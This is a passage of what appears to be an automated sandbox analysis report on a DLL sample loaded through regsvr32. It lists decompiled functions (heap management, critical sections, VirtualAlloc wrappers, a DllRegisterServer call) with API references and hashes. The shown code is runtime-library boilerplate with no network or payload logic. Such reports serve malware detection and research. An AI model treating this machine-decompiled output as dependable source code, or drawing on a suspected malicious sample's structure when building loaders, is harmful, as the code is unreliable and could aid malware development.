                                                                                                            0x1001079f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100107a1
                                                                                                            0x100107a2
                                                                                                            0x100107a5
                                                                                                            0x100107a7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100107a7
                                                                                                            0x100107a9
                                                                                                            0x100107ab
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100107ab
                                                                                                            0x10010782
                                                                                                            0x10010782
                                                                                                            0x10010782
                                                                                                            0x10010785
                                                                                                            0x10010789
                                                                                                            0x10010847
                                                                                                            0x10010847
                                                                                                            0x10010847
                                                                                                            0x1001084a
                                                                                                            0x1001084c
                                                                                                            0x1001084f
                                                                                                            0x1001084f
                                                                                                            0x10010852
                                                                                                            0x10010859
                                                                                                            0x1001085c
                                                                                                            0x1001085c
                                                                                                            0x1001085f
                                                                                                            0x10010862
                                                                                                            0x10010865
                                                                                                            0x10010872
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10010789

                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(10048600,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 10010772
                                                                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100107C8
                                                                                                            • GlobalHandle.KERNEL32(008769F8), ref: 100107D1
                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100107DA
                                                                                                            • GlobalReAlloc.KERNEL32 ref: 100107F1
                                                                                                            • GlobalHandle.KERNEL32(008769F8), ref: 10010803
                                                                                                            • GlobalLock.KERNEL32 ref: 1001080A
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 10010814
                                                                                                            • GlobalLock.KERNEL32 ref: 10010820
                                                                                                            • _memset.LIBCMT ref: 10010839
                                                                                                            • LeaveCriticalSection.KERNEL32(?,00000058,10003840), ref: 10010865
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 496899490-0
                                                                                                            • Opcode ID: 996242b7fcfa61bad23c73a9a116ea6815c52f49dbe0cd54541e6c2615ba2795
                                                                                                            • Instruction ID: cc07cb1ae1718158ec5411955b1f766252c932f609a865be9411df0e50f52d34
                                                                                                            • Opcode Fuzzy Hash: 996242b7fcfa61bad23c73a9a116ea6815c52f49dbe0cd54541e6c2615ba2795
                                                                                                            • Instruction Fuzzy Hash: 013180757047159FE325DF24CC88A2A77E9FF44241B01892DF9D6CB652DBB1F8848B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001F6F4 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 27%
                                                                                                            			E1001F6F4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x10041288);
				_t8 = E10022714(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10022759(_t8);
				}
				if( *0x1004a564 != 3) {
					_push(_t23);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x10048aa4); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E10020B71(_t31);
						 *_t10 = E10020B36(GetLastError());
					}
					goto L9;
				}
				E10023FE8(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E10024061(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1002408C();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1001F74A();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                                                                                                            0x1001f6f4
                                                                                                            0x1001f6f6
                                                                                                            0x1001f6fb
                                                                                                            0x1001f700
                                                                                                            0x1001f705
                                                                                                            0x1001f77c
                                                                                                            0x1001f781
                                                                                                            0x1001f781
                                                                                                            0x1001f70e
                                                                                                            0x1001f753
                                                                                                            0x1001f754
                                                                                                            0x1001f754
                                                                                                            0x1001f75c
                                                                                                            0x1001f762
                                                                                                            0x1001f764
                                                                                                            0x1001f766
                                                                                                            0x1001f779
                                                                                                            0x1001f77b
                                                                                                            0x00000000
                                                                                                            0x1001f764
                                                                                                            0x1001f712
                                                                                                            0x1001f718
                                                                                                            0x1001f71d
                                                                                                            0x1001f723
                                                                                                            0x1001f728
                                                                                                            0x1001f72a
                                                                                                            0x1001f72b
                                                                                                            0x1001f72c
                                                                                                            0x1001f732
                                                                                                            0x1001f733
                                                                                                            0x1001f73a
                                                                                                            0x1001f743
                                                                                                            0x00000000
                                                                                                            0x1001f745
                                                                                                            0x1001f745
                                                                                                            0x00000000
                                                                                                            0x1001f745

                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 1001F712
                                                                                                              • Part of subcall function 10023FE8: __mtinitlocknum.LIBCMT ref: 10023FFC
                                                                                                              • Part of subcall function 10023FE8: __amsg_exit.LIBCMT ref: 10024008
                                                                                                              • Part of subcall function 10023FE8: EnterCriticalSection.KERNEL32(00000001,00000001,?,10025F0B,0000000D,10041560,00000008,10025FFD,00000001,?,?,00000001,?,?,1002092A,00000001), ref: 10024010
                                                                                                            • ___sbh_find_block.LIBCMT ref: 1001F71D
                                                                                                            • ___sbh_free_block.LIBCMT ref: 1001F72C
                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,10041288,0000000C,10025E61,00000000,?,1002692B,?,00000001,00000001,10023F72,00000018,100413C8,0000000C,10024001), ref: 1001F75C
                                                                                                            • GetLastError.KERNEL32(?,1002692B,?,00000001,00000001,10023F72,00000018,100413C8,0000000C,10024001,00000001,00000001,?,10025F0B,0000000D,10041560), ref: 1001F76D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714421763-0
                                                                                                            • Opcode ID: 76888bbc55651325260b5972d5f97c4dddcca1bfca01a2c3470237c6f9f3f0fd
                                                                                                            • Instruction ID: dcea96c0beb71c26c32ed6edefd011e4960108453953efdd22255c92b90fc265
                                                                                                            • Opcode Fuzzy Hash: 76888bbc55651325260b5972d5f97c4dddcca1bfca01a2c3470237c6f9f3f0fd
                                                                                                            • Instruction Fuzzy Hash: 3E01A235809311EAEB21EBB0AD4A75E3BA4DF05364F51421CF500EE0E1CB34D9C0CA55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000373C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 207 1000373c-10003743 208 10003745-10003746 ExitProcess 207->208 209 1000374c-10003758 call 10003122 207->209 212 1000375b-1000375d 209->212
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1000373C() {
				int _t1;

				_t1 =  *0x10046a8c; // 0x83eef8
				if(_t1 == 0) {
					ExitProcess(_t1);
				}
				 *((intOrPtr*)(E10003122(_t1, "DllRegisterServer")))(); // executed
				return 0;
			}




                                                                                                            0x1000373c
                                                                                                            0x10003743
                                                                                                            0x10003746
                                                                                                            0x10003746
                                                                                                            0x10003759
                                                                                                            0x1000375d

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess
                                                                                                            • String ID: DllRegisterServer
                                                                                                            • API String ID: 621844428-1663957109
                                                                                                            • Opcode ID: 291628bf29a1733aeefe0036b6084d4be0373c307bf806f308028e93738353d8
                                                                                                            • Instruction ID: 5b79a9f3272a285f0bc727d2d6f4db5e8a7be798465fbb40fb281ab7da0c5106
                                                                                                            • Opcode Fuzzy Hash: 291628bf29a1733aeefe0036b6084d4be0373c307bf806f308028e93738353d8
                                                                                                            • Instruction Fuzzy Hash: A4C08CF22082016BF602EBB08C8880B238CEB08292311C808F000D7005EF39E4000A00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10024B73 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 213 10024b73-10024b91 HeapCreate 214 10024b93-10024b95 213->214 215 10024b96-10024ba3 call 10024b18 213->215 218 10024ba5-10024bb2 call 10024019 215->218 219 10024bc9-10024bcc 215->219 218->219 222 10024bb4-10024bc7 HeapDestroy 218->222 222->214
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10024B73(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10048aa4 = _t6;
				if(_t6 != 0) {
					_t7 = E10024B18(__eflags);
					__eflags = _t7 - 3;
					 *0x1004a564 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E10024019(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x10048aa4);
							 *0x10048aa4 =  *0x10048aa4 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}






                                                                                                            0x10024b84
                                                                                                            0x10024b8c
                                                                                                            0x10024b91
                                                                                                            0x10024b96
                                                                                                            0x10024b9b
                                                                                                            0x10024b9e
                                                                                                            0x10024ba3
                                                                                                            0x10024bc9
                                                                                                            0x10024bcb
                                                                                                            0x10024bcc
                                                                                                            0x10024ba5
                                                                                                            0x10024baa
                                                                                                            0x10024baf
                                                                                                            0x10024bb2
                                                                                                            0x00000000
                                                                                                            0x10024bb4
                                                                                                            0x10024bba
                                                                                                            0x10024bc0
                                                                                                            0x00000000
                                                                                                            0x10024bc0
                                                                                                            0x10024bb2
                                                                                                            0x10024b93
                                                                                                            0x10024b93
                                                                                                            0x10024b95
                                                                                                            0x10024b95

                                                                                                            APIs
                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,100207AC,00000001,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C), ref: 10024B84
                                                                                                            • HeapDestroy.KERNEL32(?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 10024BBA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$CreateDestroy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3296620671-0
                                                                                                            • Opcode ID: a1744ea04a4e4aac06c1af9c57638635ef45047b2ea6b21dfa4896526f954c19
                                                                                                            • Instruction ID: 7ecfd6e5781d3b6a0fc92bf663133c7527b62661b4374eaf376562758425141b
                                                                                                            • Opcode Fuzzy Hash: a1744ea04a4e4aac06c1af9c57638635ef45047b2ea6b21dfa4896526f954c19
                                                                                                            • Instruction Fuzzy Hash: 26E02230A123129EF786CB30AF8671A33F4EB06382F424836F004C98A0FFB0C140DA05
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100036FA Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 223 100036fa-10003708 call 1001f631 226 1000370a 223->226 227 1000370b-10003719 223->227 228 10003727-10003728 call 1001f6f4 227->228 229 1000371b-10003725 227->229 231 1000372d-1000373b 228->231 229->228 229->229
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E100036FA(void* __ebx, void* __esi, void* __eflags) {
				void* _t2;
				signed int _t7;
				char _t9;
				signed int _t12;
				void* _t14;
				void* _t15;
				signed int _t17;

				_t2 = E1001F631(__ebx, _t14, _t15, __esi,  *0x100440e4);
				if(_t2 != 0) {
					_t12 =  *0x100440e4; // 0x0
					_push(__ebx);
					_t9 = 0;
					__eflags = _t12;
					_push(__esi);
					_t17 = _t12;
					if(__eflags > 0) {
						do {
							 *((char*)(_t9 + _t2)) = _t9;
							_t9 = _t9 + 1;
							__eflags = _t9 -  *0x100440e4; // 0x0
						} while (__eflags < 0);
					}
					_push(_t2); // executed
					E1001F6F4(_t9, _t15, _t17, __eflags); // executed
					asm("sbb eax, eax");
					_t7 =  ~(_t9 - _t17) & 0x00000003;
					__eflags = _t7;
					return _t7;
				} else {
					return _t2;
				}
			}










                                                                                                            0x10003700
                                                                                                            0x10003708
                                                                                                            0x1000370b
                                                                                                            0x10003711
                                                                                                            0x10003712
                                                                                                            0x10003714
                                                                                                            0x10003716
                                                                                                            0x10003717
                                                                                                            0x10003719
                                                                                                            0x1000371b
                                                                                                            0x1000371b
                                                                                                            0x1000371e
                                                                                                            0x1000371f
                                                                                                            0x1000371f
                                                                                                            0x1000371b
                                                                                                            0x10003727
                                                                                                            0x10003728
                                                                                                            0x10003734
                                                                                                            0x10003737
                                                                                                            0x10003737
                                                                                                            0x1000373b
                                                                                                            0x1000370a
                                                                                                            0x1000370a
                                                                                                            0x1000370a

                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 10003700
                                                                                                              • Part of subcall function 1001F631: __FF_MSGBANNER.LIBCMT ref: 1001F654
                                                                                                              • Part of subcall function 1001F631: __NMSG_WRITE.LIBCMT ref: 1001F65B
                                                                                                              • Part of subcall function 1001F631: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1002692B,?,00000001,00000001,10023F72,00000018,100413C8,0000000C,10024001,00000001), ref: 1001F6A9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap_malloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 501242067-0
                                                                                                            • Opcode ID: 2f76cf260a46a9d53b32d34cea165e875efa5fab80f71dccc9ba808c39acbc3c
                                                                                                            • Instruction ID: adc5ccbd96ec724cefc73a2f5283e4f6b1af06d455631b59cbb6fed6ff4e13e7
                                                                                                            • Opcode Fuzzy Hash: 2f76cf260a46a9d53b32d34cea165e875efa5fab80f71dccc9ba808c39acbc3c
                                                                                                            • Instruction Fuzzy Hash: 53E086BA2141A24AFF19DAF89EE68562748D7110913228A7EE646C6556DA20E8208250
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10020E42 Relevance: 1.5, APIs: 1, Instructions: 6COMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 232 10020e42-10020e48 call 10020d63 234 10020e4d-10020e50 232->234
                                                                                                            C-Code - Quality: 25%
                                                                                                            			E10020E42() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E10020D63(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}








                                                                                                            0x10020e42
                                                                                                            0x10020e44
                                                                                                            0x10020e46
                                                                                                            0x10020e48
                                                                                                            0x10020e50

                                                                                                            APIs
                                                                                                            • _doexit.LIBCMT ref: 10020E48
                                                                                                              • Part of subcall function 10020D63: __lock.LIBCMT ref: 10020D71
                                                                                                              • Part of subcall function 10020D63: __decode_pointer.LIBCMT ref: 10020DA0
                                                                                                              • Part of subcall function 10020D63: __decode_pointer.LIBCMT ref: 10020DAD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __decode_pointer$__lock_doexit
                                                                                                            • String ID:
                                                                                                            • API String ID: 3276244213-0
                                                                                                            • Opcode ID: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
                                                                                                            • Instruction ID: ebb22d002e4bc0be4ce9b3835a93604f57b833b8c7c0406f906832a81f765660
                                                                                                            • Opcode Fuzzy Hash: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
                                                                                                            • Instruction Fuzzy Hash: 0CA00279BD530062F871D1903CD3F5421065750F01FD40051BB182C1C2A5C732584057
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000302D Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 235 1000302d-10003043 VirtualAlloc
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1000302D(void* _a4, long _a8, long _a12, long _a16) {
				void* _t5;

				_t5 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t5;
			}




                                                                                                            0x1000303d
                                                                                                            0x10003043

                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 1000303D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 1fbba5c948703a5d5ab931949a929f4f09bd1ed6a173005a8193a93e686e7ec2
                                                                                                            • Instruction ID: 5d0982da9e6573c30bbcbca7a50cfe3a5b7972743b959b5c0e66da410622836f
                                                                                                            • Opcode Fuzzy Hash: 1fbba5c948703a5d5ab931949a929f4f09bd1ed6a173005a8193a93e686e7ec2
                                                                                                            • Instruction Fuzzy Hash: 1CB00832418792EBDF02DF90CD4482ABAA2BB89301F184C5CF6A151570D7228468EF07
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10003044 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 236 10003044-10003056 VirtualFree
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10003044(void* _a4, long _a8, long _a12) {
				int _t4;

				_t4 = VirtualFree(_a4, _a8, _a12); // executed
				return _t4;
			}




                                                                                                            0x10003050
                                                                                                            0x10003056

                                                                                                            APIs
                                                                                                            • VirtualFree.KERNELBASE(?,?,?), ref: 10003050
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1263568516-0
                                                                                                            • Opcode ID: df584dda371157191712c15505aae26ff14b4c57a0491ab4d9c6d3331c076541
